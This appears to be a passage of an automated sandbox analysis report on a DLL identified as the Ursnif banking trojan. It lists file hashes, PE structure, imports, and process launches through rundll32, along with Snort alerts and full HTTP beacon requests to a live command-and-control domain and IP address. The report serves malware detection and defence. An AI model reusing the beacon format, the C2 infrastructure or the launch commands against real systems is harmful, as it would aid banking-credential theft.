Entropy (8bit):	0.4062588728086082
Encrypted:	false
SSDEEP:	12:c9lCg5/9lCgeK9l26an9l26an9l8fREF9l8fRE9lTqSd3SfGDE:c9lLh9lLh9lIn9lIn9lo09loE9lW6it
MD5:	71D24CEC0984F1D3C4CECED1D6C926F8
SHA1:	EA75BEC02ACD81F67EA2E7A050E01AB4235AF077
SHA-256:	F62B14D503003ECCF51AAB536D7B469E41789CA4B2311BF555B50F3E0B40D26E
SHA-512:	2982730976D55BC2B2436D340D67DEC61D66F9AD8801EB8CA725D67363E1DE52C2A4000DA7E605155512D860A9324FA628A87BDD35B83A7D0F9554CA329039BF
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF677CE89DC6A9E9DB.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40209
Entropy (8bit):	0.6802519082787714
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+Ye0FOna+Zaq5AXXCa+Zaq5AXXxa+Zaq5AXXS:kBqoxKAuqR+Ye0FOnaTqKCaTqKxaTqKS
MD5:	5C7DEF89A84EAA98430FE7027564DF78
SHA1:	D44DA4534C89ADA5E783ADCB8ABEA0AB95CA6543
SHA-256:	66C837632C5CC0A0B18B23E886B8337839514DD7FE99FD4131A44245712064B8
SHA-512:	748FC1AA8D28970F1EDF70A508D99535AA388F0C8B8C66ADC7D18DD85674FC03806A34CA4125A049DDF307B8D40138B61C53946817623160E8414C3A9E2E18B9
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB9EDA9C4DE41A518.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40129
Entropy (8bit):	0.6668058381904368
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+Z3lUXcfYPKkgm/QfYPKkgm/JYPKkgm/a:kBqoxKAuqR+Z3lUXcfYPxIfYPxhYPxy
MD5:	D6EE8E5C275A86A97B906F4AEDDA6134
SHA1:	63C95AA3BE00D6B6C69EB6A0E42D91FCE098718C
SHA-256:	B53595D99A0C685EBB1CC8CE1618F6EFD33F2B4B75BD07166DB2CC7ABA0B88FE
SHA-512:	913250ECBE792ADCD00C6A409EA38BDA6ACF6B3F1C057A8B7BD4A7FF9784B3B179EF3C333BB5A9C999CD549BECA40765260CC3F9E42EFF50734EB6987FB38FF0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFED4BB5723C2F8450.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.40471074511354194
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lojv9lojv9lWj/b:kBqoIjwjOjz
MD5:	5CA3A3BB7ABE9DC52F89ACAE580DD584
SHA1:	35081451F3DAE228AE3AFA7AAF835D9F2AA1A0EA
SHA-256:	C91DAE2CF83E6662D924132FEFA3347DF0B845E3B3AD46691C8B3ACDF7A08752
SHA-512:	34E1D4659E340E3C0109315D43E0B63B9CE1E99CC3FF4ABDB775D0B76EA6CFD7F9A70199683E07776B136E9279BE25DE28A7D95E466864CCDC18B9E0B9555794
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.27197014467762
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.39% Win16/32 Executable Delphi generic (2074/23) 0.21% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00%
File name:	2e.dll
File size:	79704
MD5:	92a0f1023e064a46fbf2e6bb697edf55
SHA1:	d2d28a35de82e8161266355a351a1e5822d49303
SHA256:	2e012edb93bb99de397b629cdc44d7516f9e6f47cd7106c93d2d6fd66a37af87
SHA512:	1ac25076dc2214eba995e2fab4e4ef43d998d7b75729efa3a9f75907cc18e088669444498a5f0111d237e361d0221fe6b8f1a5a9c8cdb9237e0b657a4f935b50
SSDEEP:	1536:S6+YO9+zA3PG713sAOFU+okNIXnioQ+Zw:SQO9+zAe71JykkNIXnjw
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!...2.D..........@........`...............................`.......'.....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10001240
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x6008010E [Wed Jan 20 10:08:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ff4d958d1b207f788303c2824dcf7c89

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=MHVROHWNPUNPYUVDPT
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	1/20/2021 8:14:49 AM 1/1/2040 12:59:59 AM
Subject Chain	CN=MHVROHWNPUNPYUVDPT
Version:	3
Thumbprint MD5:	08CCE083A5F15BBCB12A773F84B1C54B
Thumbprint SHA-1:	1B184C8F112872329F0305241D2CE46BCFF9D291
Thumbprint SHA-256:	B68B47B76E495611F29CD73B2184C2E24A4CAC0161C902D42588E075D7B7EB95
Serial:	36CB7E2011A25C9644D2EF1B2384DF4C

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000009Ch
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-04h], 00000000h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov dword ptr [ebp-08h], 00001AC9h
mov ecx, dword ptr [ebp+08h]
mov dword ptr [10014354h], ecx
mov dword ptr [10014334h], ebp
mov dword ptr [ebp-0Ch], 00000064h
lea eax, dword ptr [ebp-0Ch]
push eax
lea ecx, dword ptr [ebp-78h]
push ecx
call dword ptr [1001366Ch]
movzx edx, byte ptr [ebp-78h]
cmp edx, 4Ah
jne 00007F8798F4A03Bh
movzx eax, byte ptr [ebp-76h]
cmp eax, 68h
jne 00007F8798F4A032h
movzx ecx, byte ptr [ebp-74h]
cmp ecx, 44h
jne 00007F8798F4A029h
xor eax, eax
jmp 00007F8798F4CE05h
mov dword ptr [ebp-00000084h], 00000001h
mov dword ptr [ebp-0000008Ch], 00000001h
mov dword ptr [ebp-00000094h], 00000001h
mov dword ptr [ebp-7Ch], 00000001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x130e0	0xa0	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x12200	0x1558
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15000	0x470	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1342c	0x2ac	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x43ae	0x4400	False	0.112764246324	data	4.33287623125	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data2	0x6000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rdata	0x7000	0xbc04	0xbe00	False	0.910916940789	data	7.78728301124	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x13000	0x13b4	0x1400	False	0.4572265625	data	5.39696866676	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x15000	0x470	0x600	False	0.6484375	data	5.29273292424	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	LoadLibraryA, GetProcAddress, LoadResource, GetModuleHandleA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter, GetLastError, FindResourceExW, FindResourceW, LockResource, SizeofResource, GetModuleHandleW, GetModuleFileNameW, lstrcpynW, LoadLibraryExA, LoadLibraryExW, FreeLibrary, ExpandEnvironmentStringsW, lstrcpyW, GetFileAttributesW, LoadLibraryW, LCMapStringW, FreeEnvironmentStringsW, SetStdHandle, QueueUserAPC, ClearCommError, GetDiskFreeSpaceA, GetProfileSectionW, SetConsoleCursorPosition, GetTempPathW, VerSetConditionMask, GetSystemWindowsDirectoryW, SetVolumeMountPointW, GetFileType, lstrcmp, IsBadHugeWritePtr, CreateMutexW, EnumDateFormatsA, GetStringTypeExW, GetTapeStatus, TransactNamedPipe, SetThreadAffinityMask, EnumLanguageGroupLocalesA, CreateJobObjectW, lstrcmpA, ScrollConsoleScreenBufferW, _lcreat, GetVolumePathNameW, GetSystemDirectoryA, ResetWriteWatch, GlobalGetAtomNameW, SetCriticalSectionSpinCount, DefineDosDeviceA, GetLogicalDrives, SetConsoleCtrlHandler, MoveFileExW, HeapSize, RequestDeviceWakeup, ReadFile, GetProcessPriorityBoost, WriteProfileSectionA, TlsFree, IsDebuggerPresent, InterlockedCompareExchange, TlsAlloc, TlsGetValue, TlsSetValue, GetSystemTime, GetFullPathNameW, GetFullPathNameA, LockFileEx, LockFile, Sleep, UnlockFile, GetFileSize, SetEndOfFile, FlushFileBuffers, SetFilePointer, WriteFile, CloseHandle, WideCharToMultiByte, GetTempPathA, CreateFileW, CreateFileA, GetFileAttributesA, GetVersionExA, DeleteFileW, DeleteFileA, SetLastError, InterlockedExchange, lstrlenA, RaiseException
USER32.dll	LoadCursorA, CharUpperA, GetClipboardData, GetMessagePos, wsprintfW, LoadStringW, CharToOemW, SetCapture, CallNextHookEx, GetOpenClipboardWindow, VkKeyScanExW, SetMenuItemInfoW, CloseDesktop, EnumDisplaySettingsW, LoadIconW, RegisterClassExA, LookupIconIdFromDirectoryEx, CharUpperBuffA, DdeInitializeW, SetPropW, GetActiveWindow, GetDlgItemTextA, SetWindowsHookA, EnumDesktopsA, DeferWindowPos, EnumWindowStationsA, GetClipboardOwner, PostThreadMessageW, GetSysColorBrush, SetParent, ShowOwnedPopups, RealGetWindowClassW, RegisterClassExW, DdeFreeStringHandle
GDI32.dll	RealizePalette, GetBkMode, GdiEntry12, CreateDiscardableBitmap, GdiAddGlsBounds, SetTextColor, GdiGetDC, STROBJ_bGetAdvanceWidths
ADVAPI32.dll	GetUserNameA, RegOpenKeyA, LookupAccountSidW, RegCloseKey, AllocateAndInitializeSid
SHELL32.dll	SHQueryRecycleBinA, ShellExecuteExA, ExtractIconExA, WOWShellExecute, SHLoadNonloadedIconOverlayIdentifiers, SHGetDataFromIDListW, SHAddToRecentDocs, SHCreateDirectoryExA, DuplicateIcon, SHGetSpecialFolderPathW
ole32.dll	CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoUninitialize
SHLWAPI.dll	StrChrIA, StrRStrIW, StrCmpNIW, PathAppendW

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/07/21-16:20:47.437292	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49792	80	192.168.2.4	87.106.18.141
10/07/21-16:20:47.437292	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49792	80	192.168.2.4	87.106.18.141
10/07/21-16:21:32.362408	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49824	80	192.168.2.4	87.106.18.141

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 16:20:47.406502962 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.407130957 CEST	49793	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.428611994 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.428718090 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.428965092 CEST	80	49793	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.429749012 CEST	49793	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.437292099 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.459446907 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.510512114 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.510575056 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.809303045 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:47.831645012 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.857217073 CEST	80	49792	87.106.18.141	192.168.2.4
Oct 7, 2021 16:20:47.857317924 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:48.718842983 CEST	49792	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:20:48.720160961 CEST	49793	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.339324951 CEST	49823	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.339402914 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.360322952 CEST	80	49824	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.360430956 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.361443043 CEST	80	49823	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.362091064 CEST	49823	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.362407923 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.383151054 CEST	80	49824	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.410106897 CEST	80	49824	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.410197973 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.624552011 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:32.670840979 CEST	80	49824	87.106.18.141	192.168.2.4
Oct 7, 2021 16:21:32.670943975 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:33.698580980 CEST	49824	80	192.168.2.4	87.106.18.141
Oct 7, 2021 16:21:33.698653936 CEST	49823	80	192.168.2.4	87.106.18.141

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 16:20:47.362231970 CEST	64801	53	192.168.2.4	8.8.8.8
Oct 7, 2021 16:20:47.380968094 CEST	53	64801	8.8.8.8	192.168.2.4
Oct 7, 2021 16:21:32.303180933 CEST	49612	53	192.168.2.4	8.8.8.8
Oct 7, 2021 16:21:32.328233004 CEST	53	49612	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 7, 2021 16:20:47.362231970 CEST	192.168.2.4	8.8.8.8	0x67ce	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Oct 7, 2021 16:21:32.303180933 CEST	192.168.2.4	8.8.8.8	0x3b39	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 7, 2021 16:20:47.380968094 CEST	8.8.8.8	192.168.2.4	0x67ce	No error (0)	api10.laptok.at		87.106.18.141	A (IP address)	IN (0x0001)
Oct 7, 2021 16:21:32.328233004 CEST	8.8.8.8	192.168.2.4	0x3b39	No error (0)	api10.laptok.at		87.106.18.141	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49792	87.106.18.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 16:20:47.437292099 CEST	1970	OUT	GET /api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Oct 7, 2021 16:20:47.510512114 CEST	1971	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:20:47 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2021 16:20:47.809303045 CEST	1971	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Oct 7, 2021 16:20:47.857217073 CEST	1971	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:20:47 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49824	87.106.18.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 16:21:32.362407923 CEST	5628	OUT	GET /api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Oct 7, 2021 16:21:32.410106897 CEST	5629	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:21:32 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2021 16:21:32.624552011 CEST	5629	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Oct 7, 2021 16:21:32.670840979 CEST	5629	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:21:32 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 796 Parent PID: 980

General

Start time:	16:19:49
Start date:	07/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\2e.dll'
Imagebase:	0xfd0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: cmd.exe PID: 5236 Parent PID: 796

General

Start time:	16:19:50
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 4872 Parent PID: 5236

General

Start time:	16:19:50
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Imagebase:	0x1c0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: iexplore.exe PID: 6632 Parent PID: 800

General

Start time:	16:20:45
Start date:	07/10/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7e25b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 5044 Parent PID: 6632

General

Start time:	16:20:45
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
Imagebase:	0x50000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 3684 Parent PID: 800

General

Start time:	16:21:30
Start date:	07/10/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7e25b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 5716 Parent PID: 3684

General

Start time:	16:21:30
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2
Imagebase:	0x50000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
